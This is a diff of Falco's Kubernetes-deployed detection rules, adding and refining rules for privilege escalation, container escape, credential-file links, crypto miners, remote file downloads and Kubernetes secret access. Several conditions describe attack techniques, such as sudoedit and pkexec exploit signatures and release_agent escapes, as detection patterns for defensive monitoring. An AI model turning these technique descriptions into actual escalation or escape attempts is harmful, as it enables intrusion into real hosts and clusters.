-    # Copyright (C) 2020 The Falco Authors.
+    # Copyright (C) 2022 The Falco Authors.
     #
     #
     # Licensed under the Apache License, Version 2.0 (the "License");
@@ -406,13 +847,13 @@
     #   condition: (syscall.type=read and evt.dir=> and fd.type in (file, directory))
 
     - macro: open_write
-      condition: (evt.type=open or evt.type=openat) and evt.is_open_write=true and fd.typechar='f' and fd.num>=0
+      condition: evt.type in (open,openat,openat2) and evt.is_open_write=true and fd.typechar='f' and fd.num>=0
 
     - macro: open_read
-      condition: (evt.type=open or evt.type=openat) and evt.is_open_read=true and fd.typechar='f' and fd.num>=0
+      condition: evt.type in (open,openat,openat2) and evt.is_open_read=true and fd.typechar='f' and fd.num>=0
 
     - macro: open_directory
-      condition: (evt.type=open or evt.type=openat) and evt.is_open_read=true and fd.typechar='d' and fd.num>=0
+      condition: evt.type in (open,openat,openat2) and evt.is_open_read=true and fd.typechar='d' and fd.num>=0
 
     - macro: never_true
       condition: (evt.num=0)
@@ -440,11 +881,14 @@
       condition: rename or remove
 
     - macro: spawned_process
-      condition: evt.type = execve and evt.dir=<
+      condition: evt.type in (execve, execveat) and evt.dir=<
 
     - macro: create_symlink
       condition: evt.type in (symlink, symlinkat) and evt.dir=<
 
+    - macro: create_hardlink
+      condition: evt.type in (link, linkat) and evt.dir=<
+
     - macro: chmod
       condition: (evt.type in (chmod, fchmod, fchmodat) and evt.dir=<)
 
@@ -593,13 +1037,13 @@
     - list: deb_binaries
       items: [dpkg, dpkg-preconfigu, dpkg-reconfigur, dpkg-divert, apt, apt-get, aptitude,
         frontend, preinst, add-apt-reposit, apt-auto-remova, apt-key,
-        apt-listchanges, unattended-upgr, apt-add-reposit, apt-config, apt-cache, apt.systemd.dai
+        apt-listchanges, unattended-upgr, apt-add-reposit, apt-cache, apt.systemd.dai
         ]
 
     # The truncated dpkg-preconfigu is intentional, process names are
-    # truncated at the sysdig level.
+    # truncated at the falcosecurity-libs level.
     - list: package_mgmt_binaries
-      items: [rpm_binaries, deb_binaries, update-alternat, gem, pip, pip3, sane-utils.post, alternatives, chef-client, apk, snapd]
+      items: [rpm_binaries, deb_binaries, update-alternat, gem, npm, pip, pip3, sane-utils.post, alternatives, chef-client, apk, snapd]
 
     - macro: package_mgmt_procs
       condition: proc.name in (package_mgmt_binaries)
@@ -710,7 +1154,7 @@
     # for efficiency.
     - macro: inbound_outbound
       condition: >
-        ((((evt.type in (accept,listen,connect) and evt.dir=<)) or
+        ((((evt.type in (accept,listen,connect) and evt.dir=<)) and
          (fd.typechar = 4 or fd.typechar = 6)) and
          (fd.ip != "0.0.0.0" and fd.net != "127.0.0.0/8") and
          (evt.rawres >= 0 or evt.res = EINPROGRESS))
@@ -817,6 +1261,9 @@
     - list: shell_config_directories
       items: [/etc/zsh]
 
+    - macro: user_known_shell_config_modifiers
+      condition: (never_true)
+
     - rule: Modify Shell Configuration File
       desc: Detect attempt to modify shell configuration files
       condition: >
@@ -826,6 +1273,7 @@
          fd.directory in (shell_config_directories))
         and not proc.name in (shell_binaries)
         and not exe_running_docker_save
+        and not user_known_shell_config_modifiers
       output: >
         a shell configuration file has been modified (user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline pcmdline=%proc.pcmdline file=%fd.name container_id=%container.id image=%container.image.repository)
       priority:
@@ -938,7 +1386,7 @@
 
     # Qualys seems to run a variety of shell subprocesses, at various
     # levels. This checks at a few levels without the cost of a full
-    # proc.aname, which traverses the full parent heirarchy.
+    # proc.aname, which traverses the full parent hierarchy.
     - macro: run_by_qualys
       condition: >
         (proc.pname=qualys-cloud-ag or
@@ -1149,6 +1597,9 @@
     - macro: centrify_writing_krb
       condition: (proc.name in (adjoin,addns) and fd.name startswith /etc/krb5)
 
+    - macro: sssd_writing_krb
+      condition: (proc.name=adcli and proc.aname[2]=sssd and fd.name startswith /etc/krb5)
+
     - macro: cockpit_writing_conf
       condition: >
         ((proc.pname=cockpit-kube-la or proc.aname[2]=cockpit-kube-la)
@@ -1477,7 +1928,7 @@
       condition: (proc.name=oc and fd.name startswith /etc/origin/node)
 
     - macro: keepalived_writing_conf
-      condition: (proc.name=keepalived and fd.name=/etc/keepalived/keepalived.conf)
+      condition: (proc.name in (keepalived, kube-keepalived) and fd.name=/etc/keepalived/keepalived.conf)
 
     - macro: etcd_manager_updating_dns
       condition: (container and proc.name=etcd-manager and fd.name=/etc/hosts)
@@ -1592,6 +2043,7 @@
         and not nginx_writing_certs
         and not chef_client_writing_conf
         and not centrify_writing_krb
+        and not sssd_writing_krb
         and not cockpit_writing_conf
         and not ipsec_writing_conf
         and not httpd_writing_ssl_conf
@@ -2181,7 +2633,7 @@
               registry.access.redhat.com/sematext/agent,
               registry.access.redhat.com/sematext/logagent]
 
-    # These container images are allowed to run with --privileged
+    # These container images are allowed to run with --privileged and full set of capabilities
     - list: falco_privileged_images
       items: [
         docker.io/calico/node,
@@ -2199,10 +2651,12 @@
         gke.gcr.io/kube-proxy,
         gke.gcr.io/gke-metadata-server,
         gke.gcr.io/netd-amd64,
+        gke.gcr.io/watcher-daemonset,
         gcr.io/google-containers/prometheus-to-sd,
         k8s.gcr.io/ip-masq-agent-amd64,
         k8s.gcr.io/kube-proxy,
         k8s.gcr.io/prometheus-to-sd,
+        public.ecr.aws/falcosecurity/falco,
         quay.io/calico/node,
         sysdig/sysdig,
         sematext_images
@@ -2231,7 +2685,7 @@
     - list: falco_sensitive_mount_images
       items: [
         docker.io/sysdig/sysdig, sysdig/sysdig,
-        docker.io/falcosecurity/falco, falcosecurity/falco,
+        docker.io/falcosecurity/falco, falcosecurity/falco, public.ecr.aws/falcosecurity/falco,
         gcr.io/google_containers/hyperkube,
         gcr.io/google_containers/kube-proxy, docker.io/calico/node,
         docker.io/rook/toolbox, docker.io/cloudnativelabs/kube-router, docker.io/consul,
@@ -2247,19 +2701,6 @@
                   container.image.repository in (falco_sensitive_mount_images) or
                   container.image.repository startswith quay.io/sysdig/)
 
-    # These container images are allowed to run with hostnetwork=true
-    - list: falco_hostnetwork_images
-      items: [
-        gcr.io/google-containers/prometheus-to-sd,
-        gcr.io/projectcalico-org/typha,
-        gcr.io/projectcalico-org/node,
-        gke.gcr.io/gke-metadata-server,
-        gke.gcr.io/kube-proxy,
-        gke.gcr.io/netd-amd64,
-        k8s.gcr.io/ip-masq-agent-amd64
-        k8s.gcr.io/prometheus-to-sd,
-        ]
-
     # Add conditions to this macro (probably in a separate file,
     # overwriting this macro) to specify additional containers that are
     # allowed to perform sensitive mounts.
@@ -2280,14 +2721,40 @@
       priority: INFO
       tags: [container, cis, mitre_privilege_escalation, mitre_lateral_movement]
 
+    # These capabilities were used in the past to escape from containers
+    - macro: excessively_capable_container
+      condition: >
+        (thread.cap_permitted contains CAP_SYS_ADMIN
+        or thread.cap_permitted contains CAP_SYS_MODULE
+        or thread.cap_permitted contains CAP_SYS_RAWIO
+        or thread.cap_permitted contains CAP_SYS_PTRACE
+        or thread.cap_permitted contains CAP_SYS_BOOT
+        or thread.cap_permitted contains CAP_SYSLOG
+        or thread.cap_permitted contains CAP_DAC_READ_SEARCH
+        or thread.cap_permitted contains CAP_NET_ADMIN
+        or thread.cap_permitted contains CAP_BPF)
+
+    - rule: Launch Excessively Capable Container
+      desc: Detect container started with a powerful set of capabilities. Exceptions are made for known trusted images.
+      condition: >
+        container_started and container
+        and excessively_capable_container
+        and not falco_privileged_containers
+        and not user_privileged_containers
+      output: Excessively capable container started (user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline %container.info image=%container.image.repository:%container.image.tag cap_permitted=%thread.cap_permitted)
+      priority: INFO
+      tags: [container, cis, mitre_privilege_escalation, mitre_lateral_movement]
+
+
     # For now, only considering a full mount of /etc as
     # sensitive. Ideally, this would also consider all subdirectories
-    # below /etc as well, but the globbing mechanism used by sysdig
+    # below /etc as well, but the globbing mechanism
     # doesn't allow exclusions of a full pattern, only single characters.
     - macro: sensitive_mount
       condition: (container.mount.dest[/proc*] != "N/A" or
                   container.mount.dest[/var/run/docker.sock] != "N/A" or
                   container.mount.dest[/var/run/crio/crio.sock] != "N/A" or
+                  container.mount.dest[/run/containerd/containerd.sock] != "N/A" or
                   container.mount.dest[/var/lib/kubelet] != "N/A" or
                   container.mount.dest[/var/lib/kubelet/pki] != "N/A" or
                   container.mount.dest[/] != "N/A" or
@@ -2415,7 +2882,8 @@
         '"sh -c  -t -i"',
         '"sh -c openssl version"',
         '"bash -c id -Gn kafadmin"',
-        '"sh -c /bin/sh -c ''date +%%s''"'
+        '"sh -c /bin/sh -c ''date +%%s''"',
+        '"sh -c /usr/share/lighttpd/create-mime.conf.pl"'
         ]
 
     # This list allows for easy additions to the set of commands allowed
@@ -2574,7 +3042,7 @@
     #   output: "sshd sent error message to syslog (error=%evt.buffer)"
     #   priority: WARNING
 
-    - macro: somebody_becoming_themself
+    - macro: somebody_becoming_themselves
       condition: ((user.name=nobody and evt.arg.uid=nobody) or
                   (user.name=www-data and evt.arg.uid=www-data) or
                   (user.name=_apt and evt.arg.uid=_apt) or
@@ -2612,7 +3080,7 @@
         evt.type=setuid and evt.dir=>
         and (known_user_in_container or not container)
         and not (user.name=root or user.uid=0)
-        and not somebody_becoming_themself
+        and not somebody_becoming_themselves
         and not proc.name in (known_setuid_binaries, userexec_binaries, mail_binaries, docker_binaries,
                               nomachine_binaries)
         and not proc.name startswith "runc:"
@@ -2636,7 +3104,7 @@
         activity by any programs that can manage users, passwords, or permissions. sudo and su are excluded.
         Activity in containers is also excluded--some containers create custom users on top
         of a base linux distribution at startup.
-        Some innocuous commandlines that don't actually change anything are excluded.
+        Some innocuous command lines that don't actually change anything are excluded.
       condition: >
         spawned_process and proc.name in (user_mgmt_binaries) and
         not proc.name in (su, sudo, lastlog, nologin, unix_chkpwd) and not container and
@@ -2672,7 +3140,7 @@
       desc: creating any files below /dev other than known programs that manage devices. Some rootkits hide files in /dev.
       condition: >
         fd.directory = /dev and
-        (evt.type = creat or ((evt.type = open or evt.type = openat) and evt.arg.flags contains O_CREAT))
+        (evt.type = creat or (evt.type in (open,openat,openat2) and evt.arg.flags contains O_CREAT))
         and not proc.name in (dev_creation_binaries)
         and not fd.name in (allowed_dev_files)
         and not fd.name startswith /dev/tty
@@ -2686,7 +3154,7 @@
     # explicitly enumerate the container images that you want to allow
     # access to EC2 metadata. In this main falco rules file, there isn't
     # any way to know all the containers that should have access, so any
-    # container is alllowed, by repeating the "container" macro. In the
+    # container is allowed, by repeating the "container" macro. In the
     # overridden macro, the condition would look something like
     # (container.image.repository = vendor/container-1 or
     # container.image.repository = vendor/container-2 or ...)
@@ -2740,7 +3208,8 @@
          docker.io/sysdig/sysdig, docker.io/falcosecurity/falco,
          sysdig/sysdig, falcosecurity/falco,
          fluent/fluentd-kubernetes-daemonset, prom/prometheus,
-         ibm_cloud_containers)
+         ibm_cloud_containers,
+         public.ecr.aws/falcosecurity/falco)
          or (k8s.ns.name = "kube-system"))
 
     - macro: k8s_api_server
@@ -2944,27 +3413,29 @@
         WARNING
       tags: [process, mitre_persistence]
 
+    # here `ash_history` will match both `bash_history` and `ash_history`
     - macro: modify_shell_history
       condition: >
         (modify and (
-          evt.arg.name contains "bash_history" or
-          evt.arg.name contains "zsh_history" or
+          evt.arg.name endswith "ash_history" or
+          evt.arg.name endswith "zsh_history" or
           evt.arg.name contains "fish_read_history" or
           evt.arg.name endswith "fish_history" or
-          evt.arg.oldpath contains "bash_history" or
-          evt.arg.oldpath contains "zsh_history" or
+          evt.arg.oldpath endswith "ash_history" or
+          evt.arg.oldpath endswith "zsh_history" or
           evt.arg.oldpath contains "fish_read_history" or
           evt.arg.oldpath endswith "fish_history" or
-          evt.arg.path contains "bash_history" or
-          evt.arg.path contains "zsh_history" or
+          evt.arg.path endswith "ash_history" or
+          evt.arg.path endswith "zsh_history" or
           evt.arg.path contains "fish_read_history" or
           evt.arg.path endswith "fish_history"))
 
+    # here `ash_history` will match both `bash_history` and `ash_history`
     - macro: truncate_shell_history
       condition: >
         (open_write and (
-          fd.name contains "bash_history" or
-          fd.name contains "zsh_history" or
+          fd.name endswith "ash_history" or
+          fd.name endswith "zsh_history" or
           fd.name contains "fish_read_history" or
           fd.name endswith "fish_history") and evt.arg.flags contains "O_TRUNC")
 
@@ -3003,7 +3474,7 @@
       items: [hyperkube, kubelet, k3s-agent]
 
     # This macro should be overridden in user rules as needed. This is useful if a given application
-    # should not be ignored alltogether with the user_known_chmod_applications list, but only in
+    # should not be ignored altogether with the user_known_chmod_applications list, but only in
     # specific conditions.
     - macro: user_known_set_setuid_or_setgid_bit_conditions
       condition: (never_true)
@@ -3082,8 +3553,18 @@
         create_symlink and
         (evt.arg.target in (sensitive_file_names) or evt.arg.target in (sensitive_directory_names))
       output: >
-        Symlinks created over senstivie files (user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline target=%evt.arg.target linkpath=%evt.arg.linkpath parent_process=%proc.pname)
-      priority: NOTICE
+        Symlinks created over sensitive files (user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline target=%evt.arg.target linkpath=%evt.arg.linkpath parent_process=%proc.pname)
+      priority: WARNING
+      tags: [file, mitre_exfiltration]
+
+    - rule: Create Hardlink Over Sensitive Files
+      desc: Detect hardlink created over sensitive files
+      condition: >
+        create_hardlink and
+        (evt.arg.oldpath in (sensitive_file_names))
+      output: >
+        Hardlinks created over sensitive files (user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline target=%evt.arg.oldpath linkpath=%evt.arg.newpath parent_process=%proc.pname)
+      priority: WARNING
       tags: [file, mitre_exfiltration]
 
     - list: miner_ports
@@ -3176,11 +3657,10 @@
       condition: (fd.sport in (miner_ports) and fd.sip.name in (miner_domains))
 
     - macro: net_miner_pool
-      condition: (evt.type in (sendto, sendmsg) and evt.dir=< and (fd.net != "127.0.0.0/8" and not fd.snet in (rfc_1918_addresses)) and ((minerpool_http) or (minerpool_https) or (minerpool_other)))
+      condition: (evt.type in (sendto, sendmsg, connect) and evt.dir=< and (fd.net != "127.0.0.0/8" and not fd.snet in (rfc_1918_addresses)) and ((minerpool_http) or (minerpool_https) or (minerpool_other)))
 
     - macro: trusted_images_query_miner_domain_dns
-      condition: (container.image.repository in (docker.io/falcosecurity/falco, falcosecurity/falco))
-      append: false
+      condition: (container.image.repository in (docker.io/falcosecurity/falco, falcosecurity/falco, public.ecr.aws/falcosecurity/falco))
 
     # The rule is disabled by default.
     # Note: falco will send DNS request to resolve miner pool domain which may trigger alerts in your environment.
@@ -3188,13 +3668,13 @@
       desc: Miners typically connect to miner pools on common ports.
       condition: net_miner_pool and not trusted_images_query_miner_domain_dns
       enabled: false
-      output: Outbound connection to IP/Port flagged by cryptoioc.ch (command=%proc.cmdline port=%fd.rport ip=%fd.rip container=%container.info image=%container.image.repository)
+      output: Outbound connection to IP/Port flagged by https://cryptoioc.ch (command=%proc.cmdline port=%fd.rport ip=%fd.rip container=%container.info image=%container.image.repository)
       priority: CRITICAL
       tags: [network, mitre_execution]
 
     - rule: Detect crypto miners using the Stratum protocol
       desc: Miners typically specify the mining pool to connect to with a URI that begins with 'stratum+tcp'
-      condition: spawned_process and proc.cmdline contains "stratum+tcp"
+      condition: spawned_process and (proc.cmdline contains "stratum+tcp" or proc.cmdline contains "stratum2+tcp" or proc.cmdline contains "stratum+ssl" or proc.cmdline contains "stratum2+ssl")
       output: Possible miner running (command=%proc.cmdline container=%container.info image=%container.image.repository)
       priority: CRITICAL
       tags: [process, mitre_execution]
@@ -3330,7 +3810,7 @@
 
     # The two Container Drift rules below will fire when a new executable is created in a container.
     # There are two ways to create executables - file is created with execution permissions or permissions change of existing file.
-    # We will use a new sysdig filter, is_open_exec, to find all files creations with execution permission, and will trace all chmods in a container.
+    # We will use a new filter, is_open_exec, to find all files creations with execution permission, and will trace all chmods in a container.
     # The use case we are targeting here is an attempt to execute code that was not shipped as part of a container (drift) -
     # an activity that might be malicious or non-compliant.
     # Two things to pay attention to:
@@ -3363,7 +3843,7 @@
     - rule: Container Drift Detected (open+create)
       desc: New executable created in a container due to open+create
       condition: >
-        evt.type in (open,openat,creat) and
+        evt.type in (open,openat,openat2,creat) and
         evt.is_open_exec=true and
         container and
         not runc_writing_exec_fifo and
@@ -3413,7 +3893,7 @@
     # A privilege escalation to root through heap-based buffer overflow
     - rule: Sudo Potential Privilege Escalation
       desc: Privilege escalation vulnerability affecting sudo (<= 1.9.5p2). Executing sudo using sudoedit -s or sudoedit -i command with command-line argument that ends with a single backslash character from an unprivileged user it's possible to elevate the user privileges to root.
-      condition: spawned_process and user.uid != 0 and proc.name=sudoedit and (proc.args contains -s or proc.args contains -i) and (proc.args contains "\ " or proc.args endswith \)
+      condition: spawned_process and user.uid != 0 and (proc.name=sudoedit or proc.name = sudo) and (proc.args contains -s or proc.args contains -i or proc.args contains --login) and (proc.args contains "\ " or proc.args endswith \)
       output: "Detect Sudo Privilege Escalation Exploit (CVE-2021-3156) (user=%user.name parent=%proc.pname cmdline=%proc.cmdline %container.info)"
       priority: CRITICAL
       tags: [filesystem, mitre_privilege_escalation]
@@ -3431,13 +3911,17 @@
     - macro: mount_info
       condition: (proc.args="" or proc.args intersects ("-V", "-l", "-h"))
 
+    - macro: user_known_mount_in_privileged_containers
+      condition: (never_true)
+
     - rule: Mount Launched in Privileged Container
-      desc: Detect file system mount happened inside a privilegd container which might lead to container escape.
+      desc: Detect file system mount happened inside a privileged container which might lead to container escape.
       condition: >
         spawned_process and container
         and container.privileged=true
         and proc.name=mount
         and not mount_info
+        and not user_known_mount_in_privileged_containers
       output: Mount was executed inside a privileged container (user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline %container.info image=%container.image.repository:%container.image.tag)
       priority: WARNING
       tags: [container, cis, mitre_lateral_movement]
@@ -3460,12 +3944,64 @@
       priority: CRITICAL
       tags: [syscall, mitre_defense_evasion]
 
+    - list: ingress_remote_file_copy_binaries
+      items: [wget]
+
+    - macro: ingress_remote_file_copy_procs
+      condition: (proc.name in (ingress_remote_file_copy_binaries))
+
+    # Users should overwrite this macro to specify conditions under which a
+    # Custom condition for use of ingress remote file copy tool in container
+    - macro: user_known_ingress_remote_file_copy_activities
+      condition: (never_true)
+
+    -  macro: curl_download
+       condition: proc.name = curl and
+                  (proc.cmdline contains " -o " or
+                  proc.cmdline contains " --output " or
+                  proc.cmdline contains " -O " or
+                  proc.cmdline contains " --remote-name ")
+
+    - rule: Launch Ingress Remote File Copy Tools in Container
+      desc: Detect ingress remote file copy tools launched in container
+      condition: >
+        spawned_process and
+        container and
+        (ingress_remote_file_copy_procs or curl_download) and
+        not user_known_ingress_remote_file_copy_activities
+      output: >
+        Ingress remote file copy tool launched in container (user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline parent_process=%proc.pname
+        container_id=%container.id container_name=%container.name image=%container.image.repository:%container.image.tag)
+      priority: NOTICE
+      tags: [network, process, mitre_command_and_control]
+
+    # This rule helps detect CVE-2021-4034:
+    # A privilege escalation to root through memory corruption
+    - rule: Polkit Local Privilege Escalation Vulnerability (CVE-2021-4034)
+      desc: "This rule detects an attempt to exploit a privilege escalation vulnerability in Polkit's pkexec. By running specially crafted code, a local user can leverage this flaw to gain root privileges on a compromised system"
+      condition:
+        spawned_process and user.uid != 0 and proc.name=pkexec and proc.args = ''
+      output:
+        "Detect Polkit pkexec Local Privilege Escalation Exploit (CVE-2021-4034) (user=%user.loginname uid=%user.loginuid command=%proc.cmdline args=%proc.args)"
+      priority: CRITICAL
+      tags: [process, mitre_privilege_escalation]
+
+
+    - rule: Detect release_agent File Container Escapes
+      desc: "This rule detect an attempt to exploit a container escape using release_agent file. By running a container with certains capabilities, a privileged user can modify release_agent file and escape from the container"
+      condition:
+        open_write and container and fd.name endswith release_agent and (user.uid=0 or thread.cap_effective contains CAP_DAC_OVERRIDE) and thread.cap_effective contains CAP_SYS_ADMIN
+      output:
+        "Detect an attempt to exploit a container escape using release_agent file (user=%user.name user_loginuid=%user.loginuid filename=%fd.name %container.info image=%container.image.repository:%container.image.tag cap_effective=%thread.cap_effective)"
+      priority: CRITICAL
+      tags: [container, mitre_privilege_escalation, mitre_lateral_movement]
+
     # Application rules have moved to application_rules.yaml. Please look
     # there if you want to enable them by adding to
     # falco_rules.local.yaml.
   k8s_audit_rules.yaml: |
     #
-    # Copyright (C) 2019 The Falco Authors.
+    # Copyright (C) 2022 The Falco Authors.
     #
     #
     # Licensed under the Apache License, Version 2.0 (the "License");
@@ -3480,7 +4016,14 @@
     # See the License for the specific language governing permissions and
     # limitations under the License.
     #
-    - required_engine_version: 2
+
+    - required_engine_version: 12
+
+    - required_plugin_versions:
+      - name: k8saudit
+        version: 0.1.0
+      - name: json
+        version: 0.3.0
 
     # Like always_true/always_false, but works with k8s audit events
     - macro: k8s_audit_always_true
@@ -3517,13 +4060,24 @@
         cluster-autoscaler,
         "system:addon-manager",
         "cloud-controller-manager",
-        "eks:node-manager",
         "system:kube-controller-manager"
         ]
 
+    - list: eks_allowed_k8s_users
+      items: [
+        "eks:node-manager",
+        "eks:certificate-controller",
+        "eks:fargate-scheduler",
+        "eks:k8s-metrics",
+        "eks:authenticator",
+        "eks:cluster-event-watcher",
+        "eks:nodewatcher",
+        "eks:pod-identity-mutating-webhook"
+        ]
+    -
     - rule: Disallowed K8s User
       desc: Detect any k8s operation by users outside of an allowed set of users.
-      condition: kevt and non_system_user and not ka.user.name in (allowed_k8s_users)
+      condition: kevt and non_system_user and not ka.user.name in (allowed_k8s_users) and not ka.user.name in (eks_allowed_k8s_users)
       output: K8s Operation performed by user not in allowed list of users (user=%ka.user.name target=%ka.target.name/%ka.target.resource verb=%ka.verb uri=%ka.uri resp=%ka.response.code)
       priority: WARNING
       source: k8s_audit
@@ -3541,6 +4095,9 @@
     - macro: response_successful
       condition: (ka.response.code startswith 2)
 
+    - macro: kget
+      condition: ka.verb=get
+
     - macro: kcreate
       condition: ka.verb=create
 
@@ -3586,6 +4143,12 @@
     - macro: health_endpoint
       condition: ka.uri=/healthz
 
+    - macro: live_endpoint
+      condition: ka.uri=/livez
+
+    - macro: ready_endpoint
+      condition: ka.uri=/readyz
+
     - rule: Create Disallowed Pod
       desc: >
         Detect an attempt to start a pod with a container image outside of a list of allowed images.
@@ -3618,6 +4181,19 @@
       source: k8s_audit
       tags: [k8s]
 
+    # These container images are allowed to run with hostnetwork=true
+    - list: falco_hostnetwork_images
+      items: [
+        gcr.io/google-containers/prometheus-to-sd,
+        gcr.io/projectcalico-org/typha,
+        gcr.io/projectcalico-org/node,
+        gke.gcr.io/gke-metadata-server,
+        gke.gcr.io/kube-proxy,
+        gke.gcr.io/netd-amd64,
+        k8s.gcr.io/ip-masq-agent-amd64
+        k8s.gcr.io/prometheus-to-sd,
+        ]
+
     # Corresponds to K8s CIS Benchmark 1.7.4
     - rule: Create HostNetwork Pod
       desc: Detect an attempt to start a pod using the host network.
@@ -3627,6 +4203,28 @@
       source: k8s_audit
       tags: [k8s]
 
+    - list: falco_hostpid_images
+      items: []
+
+    - rule: Create HostPid Pod
+      desc: Detect an attempt to start a pod using the host pid namespace.
+      condition: kevt and pod and kcreate and ka.req.pod.host_pid intersects (true) and not ka.req.pod.containers.image.repository in (falco_hostpid_images)
+      output: Pod started using host pid namespace (user=%ka.user.name pod=%ka.resp.name ns=%ka.target.namespace images=%ka.req.pod.containers.image)
+      priority: WARNING
+      source: k8s_audit
+      tags: [k8s]
+
+    - list: falco_hostipc_images
+      items: []
+
+    - rule: Create HostIPC Pod
+      desc: Detect an attempt to start a pod using the host ipc namespace.
+      condition: kevt and pod and kcreate and ka.req.pod.host_ipc intersects (true) and not ka.req.pod.containers.image.repository in (falco_hostipc_images)
+      output: Pod started using host ipc namespace (user=%ka.user.name pod=%ka.resp.name ns=%ka.target.namespace images=%ka.req.pod.containers.image)
+      priority: WARNING
+      source: k8s_audit
+      tags: [k8s]
+
     - macro: user_known_node_port_service
       condition: (k8s_audit_never_true)
 
@@ -3661,7 +4259,7 @@
     - rule: Anonymous Request Allowed
       desc: >
         Detect any request made by the anonymous user that was allowed
-      condition: kevt and ka.user.name=system:anonymous and ka.auth.decision="allow" and not health_endpoint
+      condition: kevt and ka.user.name=system:anonymous and ka.auth.decision="allow" and not health_endpoint and not live_endpoint and not ready_endpoint
       output: Request by anonymous user allowed (user=%ka.user.name verb=%ka.verb uri=%ka.uri reason=%ka.auth.reason))
       priority: WARNING
       source: k8s_audit
@@ -3741,6 +4339,7 @@
         k8s.gcr.io/kube-apiserver,
         gke.gcr.io/kube-proxy,
         gke.gcr.io/netd-amd64,
+        gke.gcr.io/watcher-daemonset,
         k8s.gcr.io/addon-resizer
         k8s.gcr.io/prometheus-to-sd,
         k8s.gcr.io/k8s-dns-dnsmasq-nanny-amd64,
@@ -3768,9 +4367,31 @@
       items: []
 
     - list: known_sa_list
-      items: ["pod-garbage-collector","resourcequota-controller","cronjob-controller","generic-garbage-collector",
-              "daemon-set-controller","endpointslice-controller","deployment-controller", "replicaset-controller",
-              "endpoint-controller", "namespace-controller", "statefulset-controller", "disruption-controller"]
+      items: [
+        coredns,
+        coredns-autoscaler,
+        cronjob-controller,
+        daemon-set-controller,
+        deployment-controller,
+        disruption-controller,
+        endpoint-controller,
+        endpointslice-controller,
+        endpointslicemirroring-controller,
+        generic-garbage-collector,
+        horizontal-pod-autoscaler,
+        job-controller,
+        namespace-controller,
+        node-controller,
+        persistent-volume-binder,
+        pod-garbage-collector,
+        pv-protection-controller,
+        pvc-protection-controller,
+        replicaset-controller,
+        resourcequota-controller,
+        root-ca-cert-publisher,
+        service-account-controller,
+        statefulset-controller
+        ]
 
     - macro: trusted_sa
       condition: (ka.target.name in (known_sa_list, user_known_sa_list))
@@ -3797,7 +4418,7 @@
       tags: [k8s]
 
     # Detect any attempt to create a ClusterRoleBinding to the cluster-admin user
-    # (exapand this to any built-in cluster role that does "sensitive" things)
+    # (expand this to any built-in cluster role that does "sensitive" things)
     - rule: Attach to cluster-admin Role
       desc: Detect any attempt to create a ClusterRoleBinding to the cluster-admin user
       condition: kevt and clusterrolebinding and kcreate and ka.req.binding.role=cluster-admin
@@ -3910,7 +4531,7 @@
     - rule: K8s Serviceaccount Created
       desc: Detect any attempt to create a service account
       condition: (kactivity and kcreate and serviceaccount and response_successful)
-      output: K8s Serviceaccount Created (user=%ka.user.name user=%ka.target.name ns=%ka.target.namespace resp=%ka.response.code decision=%ka.auth.decision reason=%ka.auth.reason)
+      output: K8s Serviceaccount Created (user=%ka.user.name serviceaccount=%ka.target.name ns=%ka.target.namespace resp=%ka.response.code decision=%ka.auth.decision reason=%ka.auth.reason)
       priority: INFO
       source: k8s_audit
       tags: [k8s]
@@ -3918,7 +4539,7 @@
     - rule: K8s Serviceaccount Deleted
       desc: Detect any attempt to delete a service account
       condition: (kactivity and kdelete and serviceaccount and response_successful)
-      output: K8s Serviceaccount Deleted (user=%ka.user.name user=%ka.target.name ns=%ka.target.namespace resp=%ka.response.code decision=%ka.auth.decision reason=%ka.auth.reason)
+      output: K8s Serviceaccount Deleted (user=%ka.user.name serviceaccount=%ka.target.name ns=%ka.target.namespace resp=%ka.response.code decision=%ka.auth.decision reason=%ka.auth.reason)
       priority: INFO
       source: k8s_audit
       tags: [k8s]
@@ -3964,13 +4585,37 @@
       tags: [k8s]
 
     - rule: K8s Secret Deleted
-      desc: Detect any attempt to delete a secret Service account tokens are excluded.
+      desc: Detect any attempt to delete a secret. Service account tokens are excluded.
       condition: (kactivity and kdelete and secret and ka.target.namespace!=kube-system and non_system_user and response_successful)
       output: K8s Secret Deleted (user=%ka.user.name secret=%ka.target.name ns=%ka.target.namespace resp=%ka.response.code decision=%ka.auth.decision reason=%ka.auth.reason)
       priority: INFO
       source: k8s_audit
       tags: [k8s]
 
+    - rule: K8s Secret Get Successfully
+      desc: >
+        Detect any attempt to get a secret. Service account tokens are excluded.
+      condition: >
+        secret and kget
+        and kactivity
+        and response_successful
+      output: K8s Secret Get Successfully (user=%ka.user.name secret=%ka.target.name ns=%ka.target.namespace resp=%ka.response.code decision=%ka.auth.decision reason=%ka.auth.reason)
+      priority: ERROR
+      source: k8s_audit
+      tags: [k8s]
+
+    - rule:  K8s Secret Get Unsuccessfully Tried
+      desc: >
+        Detect an unsuccessful attempt to get the secret. Service account tokens are excluded.
+      condition: >
+        secret and kget
+        and kactivity
+        and not response_successful
+      output: K8s Secret Get Unsuccessfully Tried (user=%ka.user.name secret=%ka.target.name ns=%ka.target.namespace resp=%ka.response.code decision=%ka.auth.decision reason=%ka.auth.reason)
+      priority: WARNING
+      source: k8s_audit
+      tags: [k8s]
+
     # This rule generally matches all events, and as a result is disabled
     # by default. If you wish to enable these events, modify the
     # following macro.
@@ -4003,7 +4648,7 @@
     # cluster creation. This may signify a permission setting too broader.
     # As we can't check for role of the user on a general ka.* event, this
     # may or may not be an administrator. Customize the full_admin_k8s_users
-    # list to your needs, and activate at your discrection.
+    # list to your needs, and activate at your discretion.
 
     # # How to test:
     # # Execute any kubectl command connected using default cluster user, as:
@@ -4184,8 +4829,8 @@
         app: falco
         role: security
       annotations:
-        checksum/config: 9ac2b16de3ea0caa56e07879f0d383db5a400f1e84c2e04d5f2cec53f8b23a4a
-        checksum/rules: 4fead7ed0d40bd6533c61315bc4089d124976d46b052192f768b9c97be5d405e
+        checksum/config: 16c079f4d9236d61d88e62cb8375e3829b843af1d1b7a759fcb5926c811d7a0c
+        checksum/rules: 7cd22ed0976fb212ad4582922d7a021ef74c11c431d2bcd6212ebfded09f9492
         checksum/certs: 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b
     spec:
       serviceAccountName: falco
@@ -4196,7 +4841,7 @@
           operator: Exists
       containers:
         - name: falco
